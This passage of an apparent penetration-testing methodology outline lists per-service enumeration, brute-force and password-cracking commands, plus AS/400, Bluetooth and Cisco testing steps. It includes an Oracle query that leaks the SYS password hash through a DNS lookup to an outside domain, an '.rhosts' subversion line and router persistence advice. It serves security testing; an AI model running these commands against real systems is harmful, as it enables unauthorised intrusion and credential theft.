16.10.7.1.1. awk -F " " '{print $3,$11}' filename | sort | uniq

16.10.8. References

16.10.8.1. White Papers

16.10.8.1.1. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness

16.10.8.1.2. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity

16.10.8.1.3. Blind Security Testing - An Evolutionary Approach

16.10.8.1.4. Command Injection in XML Signatures and Encryption

16.10.8.1.5. Input Validation Cheat Sheet

16.10.8.1.6. SQL Injection Cheat Sheet

16.10.8.2. Books

16.10.8.2.1. Hacking Exposed Web 2.0

16.10.8.2.2. Hacking Exposed Web Applications

16.10.8.2.3. The Web Application Hacker's Handbook

16.10.9. Exploit Frameworks

16.10.9.1. Brute-force Tools

16.10.9.1.1. Acunetix

16.10.9.2. Metasploit

16.10.9.3. w3af

16.11. Portmapper port 111 open

16.11.1. rpcdump.py

16.11.1.1. rpcdump.py username:[email protected]_Address port/protocol (i.e. 80/HTTP)

16.11.2. rpcinfo

16.11.2.1. rpcinfo [options] IP_Address

16.12. NTP Port 123 open

16.12.1. NTP Enumeration

16.12.1.1. ntpdc -c monlist IP_ADDRESS

16.12.1.2. ntpdc -c sysinfo IP_ADDRESS

16.12.1.3. ntpq

16.12.1.3.1. host

16.12.1.3.2. hostname

16.12.1.3.3. ntpversion

16.12.1.3.4. readlist

16.12.1.3.5. version

16.12.2. Examine configuration files

16.12.2.1. ntp.conf

16.12.3. nmap nse script

16.12.3.1. ntp-info

16.13. NetBIOS Ports 135-139,445 open

16.13.1. NetBIOS enumeration

16.13.1.1. Enum

16.13.1.1.1. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>

16.13.1.2. Null Session

16.13.1.2.1. net use \\192.168.1.1\ipc$ "" /u:""

16.13.1.3. Smbclient

16.13.1.3.1. smbclient -L //server/share password options

16.13.1.4. Superscan

16.13.1.4.1. Enumeration tab.

16.13.1.5. user2sid/sid2user

16.13.1.6. Winfo

16.13.2. NetBIOS brute force

16.13.2.1. Hydra

16.13.2.2. Brutus

16.13.2.3. Cain & Abel

16.13.2.4. getacct

16.13.2.5. NAT (NetBIOS Auditing Tool)

16.13.3. Examine Configuration Files

16.13.3.1. Smb.conf

16.13.3.2. lmhosts

16.14. SNMP port 161 open

16.14.1. Default Community Strings

16.14.1.1. public

16.14.1.2. private

16.14.1.3. cisco

16.14.1.3.1. cable-docsis

16.14.1.3.2. ILMI

16.14.2. MIB enumeration

16.14.2.1. Windows NT

16.14.2.1.1. .1.3.6.1.2.1.1.5 Hostnames

16.14.2.1.2. .1.3.6.1.4.1.77.1.4.2 Domain Name

16.14.2.1.3. .1.3.6.1.4.1.77.1.2.25 Usernames

16.14.2.1.4. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services

16.14.2.1.5. .1.3.6.1.4.1.77.1.2.27 Share Information

16.14.2.2. Solarwinds MIB walk

16.14.2.3. Getif

16.14.2.4. snmpwalk

16.14.2.4.1. snmpwalk -v <Version> -c <Community string> <IP>

16.14.2.5. Snscan

16.14.2.6. Applications

16.14.2.6.1. ZyXel

16.14.2.7. nmap nse script

16.14.2.7.1. snmp-sysdescr

16.14.3. SNMP Bruteforce

16.14.3.1. onesixtyone

16.14.3.1.1. onesixtyone -c SNMP.wordlist <IP>

16.14.3.2. cat

16.14.3.2.1. ./cat -h <IP> -w SNMP.wordlist

16.14.3.3. Solarwinds SNMP Brute Force

16.14.3.4. ADMsnmp

16.14.3.5. nmap nse script

16.14.3.5.1. snmp-brute

16.14.4. Examine SNMP Configuration files

16.14.4.1. snmp.conf

16.14.4.2. snmpd.conf

16.14.4.3. snmp-config.xml

16.15. LDAP Port 389 Open

16.15.1. ldap enumeration

16.15.1.1. ldapminer

16.15.1.1.1. ldapminer -h ip_address -p port (not required if default) -d

16.15.1.2. luma

16.15.1.2.1. Gui based tool

16.15.1.3. ldp

16.15.1.3.1. Gui based tool

16.15.1.4. openldap

16.15.1.4.1. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]

16.15.1.4.2. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

16.15.1.4.3. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]

16.15.1.4.4. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

16.15.1.4.5. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]

16.15.2. ldap brute force

16.15.2.1. bf_ldap

16.15.2.1.1. bf_ldap -s server -d domain_name -u username | -U users_list_file -L passwords_list | -l password_length [-p port (default 389)] [-v (verbose mode)] [-P ldap_user_path (default ,CN=Users,)]

16.15.2.2. K0ldS

16.15.2.3. LDAP_Brute.pl

16.15.3. Examine Configuration Files

16.15.3.1. General

16.15.3.1.1. containers.ldif

16.15.3.1.2. ldap.cfg

16.15.3.1.3. ldap.conf

16.15.3.1.4. ldap.xml

16.15.3.1.5. ldap-config.xml

16.15.3.1.6. ldap-realm.xml

16.15.3.1.7. slapd.conf

16.15.3.2. IBM SecureWay V3 server

16.15.3.2.1. V3.sas.oc

16.15.3.3. Microsoft Active Directory server

16.15.3.3.1. msadClassesAttrs.ldif

16.15.3.4. Netscape Directory Server 4

16.15.3.4.1. nsslapd.sas_at.conf

16.15.3.4.2. nsslapd.sas_oc.conf

16.15.3.5. OpenLDAP directory server

16.15.3.5.1. slapd.sas_at.conf

16.15.3.5.2. slapd.sas_oc.conf

16.15.3.6. Sun ONE Directory Server 5.1

16.15.3.6.1. 75sas.ldif

16.16. PPTP/L2TP/VPN port 500/1723 open

16.16.1. Enumeration

16.16.1.1. ike-scan

16.16.1.2. ike-probe

16.16.2. Brute-Force

16.16.2.1. ike-crack

16.16.3. Reference Material

16.16.3.1. PSK cracking paper

16.16.3.2. SecurityFocus Infocus

16.16.3.3. Scanning a VPN Implementation

16.17. Modbus port 502 open

16.17.1. modscan

16.18. rlogin port 513 open

16.18.1. Rlogin Enumeration

16.18.1.1. Find the files

16.18.1.1.1. find / -name .rhosts

16.18.1.1.2. locate .rhosts

16.18.1.2. Examine Files

16.18.1.2.1. cat .rhosts

16.18.1.3. Manual Login

16.18.1.3.1. rlogin hostname -l username

16.18.1.3.2. rlogin <IP>

16.18.1.4. Subvert the files

16.18.1.4.1. echo ++ > .rhosts

16.18.2. Rlogin Brute force

16.18.2.1. Hydra

16.19. rsh port 514 open

16.19.1. Rsh Enumeration

16.19.1.1. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command

16.19.2. Rsh Brute Force

16.19.2.1. rsh-grind

16.19.2.2. Hydra

16.19.2.3. medusa

16.20. SQL Server Port 1433/1434 open

16.20.1. SQL Enumeration

16.20.1.1. piggy

16.20.1.2. SQLPing

16.20.1.2.1. sqlping ip_address/hostname

16.20.1.3. SQLPing2

16.20.1.4. SQLPing3

16.20.1.5. SQLpoke

16.20.1.6. SQL Recon

16.20.1.7. SQLver

16.20.2. SQL Brute Force

16.20.2.1. SQLPAT

16.20.2.1.1. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack

16.20.2.1.2. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack

16.20.2.2. SQL Dict

16.20.2.3. SQLAT

16.20.2.4. Hydra

16.20.2.5. SQLlhf

16.20.2.6. ForceSQL

16.21. Citrix port 1494 open

16.21.1. Citrix Enumeration

16.21.1.1. Default Domain

16.21.1.2. Published Applications

16.21.1.2.1. ./citrix-pa-scan {IP_address/file | - | random} [timeout]

16.21.1.2.2. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]

16.21.2. Citrix Brute Force

16.21.2.1. bforce.js

16.21.2.2. connect.js

16.21.2.3. Citrix Brute-forcer

16.21.2.4. Reference Material

16.21.2.4.1. Hacking Citrix - the legitimate backdoor

16.21.2.4.2. Hacking Citrix - the forceful way

16.22. Oracle Port 1521 Open

16.22.1. Oracle Enumeration

16.22.1.1. oracsec

16.22.1.2. Repscan

16.22.1.3. Sidguess

16.22.1.4. Scuba

16.22.1.5. DNS/HTTP Enumeration

16.22.1.5.1. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL;

16.22.1.5.2. Untitled

16.22.1.6. WinSID

16.22.1.7. Oracle default password list

16.22.1.8. TNSVer

16.22.1.8.1. tnsver host [port]

16.22.1.9. TCP Scan

16.22.1.10. Oracle TNSLSNR

16.22.1.10.1. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]

16.22.1.11. TNSCmd

16.22.1.11.1. perl tnscmd.pl -h ip_address

16.22.1.11.2. perl tnscmd.pl version -h ip_address

16.22.1.11.3. perl tnscmd.pl status -h ip_address

16.22.1.11.4. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)

16.22.1.12. LSNrCheck

16.22.1.13. Oracle Security Check (needs credentials)

16.22.1.14. OAT

16.22.1.14.1. sh opwg.sh -s ip_address

16.22.1.14.2. opwg.bat -s ip_address

16.22.1.14.3. sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID

16.22.1.15. OScanner

16.22.1.15.1. sh oscanner.sh -s ip_address

16.22.1.15.2. oscanner.exe -s ip_address

16.22.1.15.3. sh reportviewer.sh oscanner_saved_file.xml

16.22.1.15.4. reportviewer.exe oscanner_saved_file.xml

16.22.1.16. NGS Squirrel for Oracle

16.22.1.17. Service Register

16.22.1.17.1. Service-register.exe ip_address

16.22.1.18. PLSQL Scanner 2008

16.22.2. Oracle Brute Force

16.22.2.1. OAK

16.22.2.1.1. ora-getsid hostname port sid_dictionary_list

16.22.2.1.2. ora-auth-alter-session host port sid username password sql

16.22.2.1.3. ora-brutesid host port start

16.22.2.1.4. ora-pwdbrute host port sid username password-file

16.22.2.1.5. ora-userenum host port sid userlistfile

16.22.2.1.6. ora-ver -e (-f -l -a) host port

16.22.2.2. breakable (Targets Application Server Port)

16.22.2.2.1. breakable.exe host url [port] [v] (host: IP address of the Oracle Portal Server; url: PATH_INFO, i.e. /pls/orasso; port: TCP port the Oracle Portal Server is serving pages from; v: verbose)

16.22.2.3. SQLInjector (Targets Application Server Port)

16.22.2.3.1. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL

16.22.2.3.2. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle

16.22.2.4. Check Password

16.22.2.5. orabf

16.22.2.5.1. orabf [hash]:[username] [options]

16.22.2.6. thc-orakel

16.22.2.6.1. Cracker

16.22.2.6.2. Client

16.22.2.6.3. Crypto

16.22.2.7. DBVisualisor

16.22.2.7.1. Sql scripts from pentest.co.uk

16.22.2.7.2. Manual SQL input of previously reported vulnerabilities

16.22.3. Oracle Reference Material

16.22.3.1. Understanding SQL Injection

16.22.3.2. SQL Injection walkthrough

16.22.3.3. SQL Injection by example

16.22.3.4. Advanced SQL Injection in Oracle databases

16.22.3.5. Blind SQL Injection

16.22.3.6. SQL Cheatsheets

16.22.3.6.1. Untitled

16.23. NFS Port 2049 open

16.23.1. NFS Enumeration

16.23.1.1. showmount -e hostname/ip_address

16.23.1.2. mount -t nfs ip_address:/directory_found_exported /local_mount_point

16.23.2. NFS Brute Force

16.23.2.1. Interact with NFS share and try to add/delete

16.23.2.2. Exploit and Confuse Unix

16.23.3. Examine Configuration Files

16.23.3.1. /etc/exports

16.23.3.2. /etc/lib/nfs/xtab

16.23.4. nmap nse script

16.23.4.1. nfs-showmount

16.24. Compaq/HP Insight Manager Port 2301, 2381 open

16.24.1. HP Enumeration

16.24.1.1. Authentication Method

16.24.1.1.1. Host OS Authentication

16.24.1.1.2. Default Authentication

16.24.1.2. Wikto

16.24.1.3. Nstealth

16.24.2. HP Bruteforce

16.24.2.1. Hydra

16.24.2.2. Acunetix

16.24.3. Examine Configuration Files

16.24.3.1. path.properties

16.24.3.2. mx.log

16.24.3.3. CLIClientConfig.cfg

16.24.3.4. database.props

16.24.3.5. pg_hba.conf

16.24.3.6. jboss-service.xml

16.24.3.7. .namazurc

16.25. MySQL port 3306 open

16.25.1. Enumeration

16.25.1.1. nmap -A -n -p3306 <IP Address>

16.25.1.2. nmap -A -n -PN --script:ALL -p3306 <IP Address>

16.25.1.3. telnet IP_Address 3306

16.25.1.4. use test; select * from test;

16.25.1.5. To check for other DB's -- show databases

16.25.2. Administration

16.25.2.1. MySQL Network Scanner

16.25.2.2. MySQL GUI Tools

16.25.2.3. mysqlshow

16.25.2.4. mysqlbinlog

16.25.3. Manual Checks

16.25.3.1. Default usernames and passwords

16.25.3.1.1. username: root password:

16.25.3.1.2. testing

16.25.3.2. Configuration Files

16.25.3.2.1. Operating System

16.25.3.2.2. Command History

16.25.3.2.3. Log Files

16.25.3.2.4. To run many sql commands at once -- mysql -u username -p < manycommands.sql

16.25.3.2.5. MySQL data directory (Location specified in my.cnf)

16.25.3.2.6. SSL Check

16.25.3.3. Privilege Escalation

16.25.3.3.1. Current Level of access

16.25.3.3.2. Access passwords

16.25.3.3.3. Create a new user and grant him privileges

16.25.3.3.4. Break into a shell

16.25.4. SQL injection

16.25.4.1. mysql-miner.pl

16.25.4.1.1. mysql-miner.pl http://target/ expected_string database

16.25.4.2. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html

16.25.4.3. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

16.25.5. References.

16.25.5.1. Design Weaknesses

16.25.5.1.1. MySQL running as root

16.25.5.1.2. Exposed publicly on Internet

16.25.5.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql

16.25.5.3. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0

16.26. RDesktop port 3389 open

16.26.1. Rdesktop Enumeration

16.26.1.1. Remote Desktop Connection

16.26.2. Rdesktop Bruteforce

16.26.2.1. TSGrinder

16.26.2.1.1. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address

16.26.2.2. Tscrack

16.27. Sybase Port 5000+ open

16.27.1. Sybase Enumeration

16.27.1.1. sybase-version ip_address from NGS

16.27.2. Sybase Vulnerability Assessment

16.27.2.1. Use DBVisualiser

16.27.2.1.1. Sybase Security checksheet

16.27.2.1.2. Manual SQL input of previously reported vulnerabilities

16.27.2.2. NGS Squirrel for Sybase

16.28. SIP Port 5060 open

16.28.1. SIP Enumeration

16.28.1.1. netcat

16.28.1.1.1. nc IP_Address Port

16.28.1.2. sipflanker

16.28.1.2.1. python sipflanker.py 192.168.1-254

16.28.1.3. Sipscan

16.28.1.4. smap

16.28.1.4.1. smap IP_Address/Subnet_Mask

16.28.1.4.2. smap -o IP_Address/Subnet_Mask

16.28.1.4.3. smap -l IP_Address

16.28.2. SIP Packet Crafting etc.

16.28.2.1. sipsak

16.28.2.1.1. Tracing paths: - sipsak -T -s sip:[email protected]

16.28.2.1.2. Options request:- sipsak -vv -s sip:[email protected]

16.28.2.1.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:[email protected]

16.28.2.2. siprogue

16.28.3. SIP Vulnerability Scanning/ Brute Force

16.28.3.1. tftp bruteforcer

16.28.3.1.1. Default dictionary file

16.28.3.1.2. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes

16.28.3.2. VoIPaudit

16.28.3.3. SiVuS

16.28.4. Examine Configuration Files

16.28.4.1. SIPDefault.cnf

16.28.4.2. asterisk.conf

16.28.4.3. sip.conf

16.28.4.4. phone.conf

16.28.4.5. sip_notify.conf

16.28.4.6. <Ethernet address>.cfg

16.28.4.7. 000000000000.cfg

16.28.4.8. phone1.cfg

16.28.4.9. sip.cfg etc. etc.

16.29. VNC port 5900^ open

16.29.1. VNC Enumeration

16.29.1.1. Scans

16.29.1.1.1. 5900^ for direct access. 5800 for HTTP access.

16.29.2. VNC Brute Force

16.29.2.1. Password Attacks

16.29.2.1.1. Remote

16.29.2.1.2. Local

16.29.3. Examine Configuration Files

16.29.3.1. .vnc

16.29.3.2. /etc/vnc/config

16.29.3.3. $HOME/.vnc/config

16.29.3.4. /etc/sysconfig/vncservers

16.29.3.5. /etc/vnc.conf

16.30. Tor Port 9001, 9030 open

16.30.1. Tor Node Checker

16.30.1.1. Ip Pages

16.30.1.2. Kewlio.net

16.30.2. nmap NSE script

16.31. Jet Direct 9100 open

16.31.1. hijetta

17. Password cracking

17.1. Rainbow crack

17.1.1. ophcrack

17.1.2. rainbow tables

17.1.2.1. rcrack c:\rainbowcrack\*.rt -f pwfile.txt

17.2. Ophcrack

17.3. Cain & Abel

17.4. John the Ripper

17.4.1. ./unshadow passwd shadow > file_to_crack

17.4.2. ./john -single file_to_crack

17.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack

17.4.4. ./john -show file_to_crack

17.4.5. ./john --incremental:All file_to_crack

17.5. fgdump

17.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt

17.6. pwdump6

17.7. medusa

17.8. LCP

17.9. L0phtcrack (Note: this tool was acquired by Symantec from @Stake, and it is their policy not to ship it outside the USA and Canada)

17.9.1. Domain credentials

17.9.2. Sniffing

17.9.3. pwdump import

17.9.4. sam import

17.10. aiocracker

17.10.1. aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list

18. Vulnerability Assessment - Utilising vulnerability scanners, all discovered hosts can then be tested for vulnerabilities. The results are then analysed to determine whether there are any vulnerabilities that could be exploited to gain access to a target host on the network. A number of the tests carried out by these scanners are just banner grabbing/obtaining version information; once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released, and the matches are reported to the user. Other tools actually use manual pen testing methods and display the output received, i.e. showmount -e ip_address would display the NFS shares available to the scanner, which would then need to be verified by the tester.

18.1. Manual

18.1.1. Patch Levels

18.1.2. Confirmed Vulnerabilities

18.1.2.1. Severe

18.1.2.2. High

18.1.2.3. Medium

18.1.2.4. Low

18.2. Automated

18.2.1. Reports

18.2.2. Vulnerabilities

18.2.2.1. Severe

18.2.2.2. High

18.2.2.3. Medium

18.2.2.4. Low

18.3. Tools

18.3.1. GFI

18.3.2. Nessus (Linux)

18.3.2.1. Nessus (Windows)

18.3.3. NGS Typhon

18.3.4. NGS Squirrel for Oracle

18.3.5. NGS Squirrel for SQL

18.3.6. SARA

18.3.7. MatriXay

18.3.8. BiDiBlah

18.3.9. SSA

18.3.10. Oval Interpreter

18.3.11. Xscan

18.3.12. Security Manager +

18.3.13. Inguma

18.4. Resources

18.4.1. Security Focus

18.4.2. Microsoft Security Bulletin

18.4.3. Common Vulnerabilities and Exploits (CVE)

18.4.4. National Vulnerability Database (NVD)

18.4.5. The Open Source Vulnerability Database (OSVDB)

18.4.5.1. Standalone Database

18.4.5.1.1. Update URL

18.4.6. United States Computer Emergency Response Team (US-CERT)

18.4.7. Computer Emergency Response Team

18.4.8. Mozilla Security Information

18.4.9. SANS

18.4.10. Securiteam

18.4.11. PacketStorm Security

18.4.12. Security Tracker

18.4.13. Secunia

18.4.14. Vulnerabilities.org

18.4.15. ntbugtraq

18.4.16. Wireless Vulnerabilities and Exploits (WVE)

18.5. Blogs

18.5.1. Carnal0wnage

18.5.2. F-Secure Blog

18.5.3. g0ne blog

18.5.4. GNUCitizen

18.5.5. ha.ckers Blog

18.5.6. Jeremiah Grossman Blog

18.5.7. Metasploit

18.5.8. nCircle Blogs

18.5.9. pentestmonkey.net

18.5.10. Rational Security

18.5.11. Rise Security

18.5.12. Security Fix Blog

18.5.13. Software Vulnerability Exploitation Blog

18.5.14. Taosecurity Blog

19. AS/400 Auditing

19.1. Remote

19.1.1. Information Gathering

19.1.1.1. Nmap using common iSeries (AS/400) services.

19.1.1.1.1. Unsecured services (Port;name;description)

19.1.1.1.2. Secured services (Port;name;description)

19.1.1.2. NetCat (old school technique)

19.1.1.2.1. nc -v -z -w target ListOfServices.txt | grep "open"

19.1.1.3. Banner Grabbing

19.1.1.3.1. Telnet

19.1.1.3.2. FTP

19.1.1.3.3. HTTP Banner

19.1.1.3.4. POP3

19.1.1.3.5. SNMP

19.1.1.3.6. SMTP

19.1.2. Users Enumeration

19.1.2.1. Default AS/400 user accounts

19.1.2.2. Error messages

19.1.2.2.1. Telnet Login errors

19.1.2.2.2. POP3 authentication Errors

19.1.2.3. Qsys symbolic link (if ftp is enabled)

19.1.2.3.1. ftp target | quote stat | quote site namefmt 1

19.1.2.3.2. cd /

19.1.2.3.3. quote site listfmt 1

19.1.2.3.4. mkdir temp

19.1.2.3.5. quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')

19.1.2.3.6. quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')

19.1.2.3.7. dir /temp/qsys/*.usrprf

19.1.2.4. LDAP

19.1.2.4.1. Need os400-sys value from ibm-slapdSuffix

19.1.2.4.2. Tool to browse LDAP

19.1.3. Exploitation

19.1.3.1. CVE References

19.1.3.1.1. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=AS400

19.1.3.1.2. CVE-2005-1244 - Severity : High - CVSS : 7.0

19.1.3.1.3. CVE-2005-1243 - Severity : Low - CVSS : 3.3

19.1.3.1.4. CVE-2005-1242 - Severity : Low - CVSS : 3.3

19.1.3.1.5. CVE-2005-1241 - Severity : High - CVSS : 7.0

19.1.3.1.6. CVE-2005-1240 - Severity : High - CVSS : 7.0

19.1.3.1.7. CVE-2005-1239 - Severity : Low - CVSS : 3.3

19.1.3.1.8. CVE-2005-1238 - Severity : High - CVSS : 9.0

19.1.3.1.9. CVE-2005-1182 - Severity : Low - CVSS : 3.3

19.1.3.1.10. CVE-2005-1133 - Severity : Low - CVSS : 3.3

19.1.3.1.11. CVE-2005-1025 - Severity : Low - CVSS : 3.3

19.1.3.1.12. CVE-2005-0868 - Severity : High - CVSS : 7.0

19.1.3.1.13. CVE-2005-0899 - Severity : Low - CVSS : 2.3

19.1.3.1.14. CVE-2002-1822 - Severity : Low - CVSS : 3.3

19.1.3.1.15. CVE-2002-1731 - Severity : Low - CVSS : 2.3

19.1.3.1.16. CVE-2000-1038 - Severity : Low - CVSS : 3.3

19.1.3.1.17. CVE-1999-1279 - Severity : Low - CVSS : 3.3

19.1.3.1.18. CVE-1999-1012 - Severity : Low - CVSS : 3.3

19.1.3.2. Access with Work Station Gateway

19.1.3.2.1. http://target:5061/WSG

19.1.3.2.2. Default AS/400 accounts.

19.1.3.3. Network attacks (next release)

19.1.3.3.1. DB2

19.1.3.3.2. QSHELL

19.1.3.3.3. Hijacking Terminals

19.1.3.3.4. Trojan attacks

19.1.3.3.5. Hacking from AS/400

19.2. Local

19.2.1. System Value Security

19.2.1.1. Untitled

19.2.1.1.1. Untitled

19.2.1.2. Untitled

19.2.1.2.1. Untitled

19.2.1.3. Untitled

19.2.1.3.1. Untitled

19.2.1.4. Untitled

19.2.1.4.1. Recommended value is 30

19.2.2. Password Policy

19.2.2.1. Untitled

19.2.2.1.1. Untitled

19.2.2.2. Untitled

19.2.2.2.1. Untitled

19.2.2.3. Untitled

19.2.2.3.1. Untitled

19.2.2.4. Untitled

19.2.2.4.1. Untitled

19.2.2.5. Untitled

19.2.3. Audit level

19.2.3.1. Untitled

19.2.3.1.1. Recommended value is *SECURITY

19.2.4. Documentation

19.2.4.1. Users class

19.2.4.1.1. Untitled

19.2.4.2. System Audit Settings

19.2.4.2.1. Untitled

19.2.4.3. Special Authorities Definitions

19.2.4.3.1. Untitled

20. Bluetooth Specific Testing

20.1. Bluescanner

20.2. Bluesweep

20.3. btscanner

20.4. Redfang

20.5. Blueprint

20.6. Bluesnarfer

20.7. Bluebugger

20.7.1. bluebugger [OPTIONS] -a <addr> [MODE]

20.8. Blueserial

20.9. Bloover

20.10. Bluesniff

20.11. Exploit Frameworks

20.11.1. BlueMaho

20.11.1.1. Untitled

20.12. Resources

20.12.1. URLs

20.12.1.1. BlueStumbler.org

20.12.1.2. Bluejackq.com

20.12.1.3. Bluejacking.com

20.12.1.4. Bluejackers

20.12.1.5. bluetooth-pentest

20.12.1.6. ibluejackedyou.com

20.12.1.7. Trifinite

20.12.2. Vulnerability Information

20.12.2.1. Common Vulnerabilities and Exploits (CVE)

20.12.2.1.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth

20.12.3. White Papers

20.12.3.1. Bluesnarfing

21. Cisco Specific Testing

21.1. Methodology

21.1.1. Scan & Fingerprint.

21.1.1.1. Untitled

21.1.1.2. Untitled

21.1.1.3. If SNMP is active, then community string guessing should be performed.

21.1.2. Credentials Guessing.

21.1.2.1. Untitled

21.1.2.2. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!

21.1.3. Connect

21.1.3.1. Untitled

21.1.3.2. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.

21.1.4. Check for bugs

21.1.4.1. Untitled

21.1.4.1.1. The most widely known/used are: Nessus, Retina, GFI LanGuard and Core Impact.

21.1.4.1.2. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln

21.1.5. Further your attack

21.1.5.1. Untitled

21.1.5.1.1. running-config is the currently running configuration settings. This gets loaded from the startup-config on boot. This configuration file is editable and the changes are immediate, but any changes will be lost once the router is rebooted. It is this file that requires altering to maintain a non-permanent connection through to the internal network.

21.1.5.1.2. startup-config is the boot-up configuration file. It is this file that needs altering to maintain a permanent connection through to the internal network.

21.1.5.2. Untitled

21.1.5.2.1. #> access-list 100 permit ip <IP> any

21.2. Scan & Fingerprint.

21.2.1. Port Scanning

21.2.1.1. nmap

21.2.1.1.1. Untitled

21.2.1.2. Other tools

21.2.1.2.1. Untitled

21.2.1.2.2. mass-scanner is a simple scanner for discovering Cisco devices within a given network range.

21.2.2. Fingerprinting

21.2.2.1. Untitled

21.2.2.1.1. BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175

21.2.2.2. Untitled

21.2.2.2.1. TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt

21.2.2.2.2. Untitled

21.3. Password Guessing.

21.3.1. Untitled

21.3.1.1. ./CAT -h <IP> -a password.wordlist

21.3.1.2. Untitled

21.3.2. Untitled

21.3.2.1. ./enabler <IP> [-u username] -p password /password.wordlist [port]

21.3.2.2. Untitled

21.3.3. Untitled

21.3.3.1. BT tmp # hydra -l "" -P password.wordlist -t 4 <IP> cisco

21.3.3.2. Untitled

21.4. SNMP Attacks.

21.4.1. Untitled

21.4.1.1. ./CAT -h <IP> -w SNMP.wordlist

21.4.1.2. Untitled

21.4.2. Untitled

21.4.2.1. onesixtyone -c SNMP.wordlist <IP>

21.4.2.2. BT onesixtyone-0.3.2 # onesixtyone -c dict.txt 10.1.1.175
Scanning 1 hosts, 64 communities
10.1.1.175 [enable] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
10.1.1.175 [Cisco] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug

21.4.3. Untitled

21.4.3.1. snmpwalk -v <Version> -c <Community string> <IP>

21.4.3.2. Untitled

21.5. Connecting.

21.5.1. Telnet

21.5.1.1. Untitled

21.5.1.1.1. telnet <IP>

21.5.1.1.2. Sample Banners

21.5.2. SSH

21.5.3. Web Browser

21.5.3.1. Untitled

21.5.3.1.1. This uses a combination of username and password to authenticate. After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:

21.5.3.1.2. Authentication Required
Enter username and password for "level_15_access" at http://10.1.1.1
User Name:
Password:

21.5.3.1.3. Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.

21.5.4. TFTP

21.5.4.1. Untitled

